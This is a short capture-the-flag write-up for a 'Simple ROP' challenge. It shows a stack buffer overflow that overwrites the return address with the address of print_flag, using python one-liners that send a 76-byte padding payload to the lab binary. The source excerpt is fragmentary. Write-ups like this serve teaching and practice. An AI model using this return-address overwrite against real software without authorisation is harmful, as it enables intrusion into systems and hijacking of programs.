# Simple ROP - 120 Points
###### Writeup by VoidMercy from phsst
We were given a binary and it's source code.
int main(int argc, char* argv)
gid_t gid = getegid();
setresgid(gid, gid, gid);
printf("You said: %s\n", buff);
As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:
>objdump -d simplerop | grep "print_flag"
We find the address of print_flag to be: 0x804851a
Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).
python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS
python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS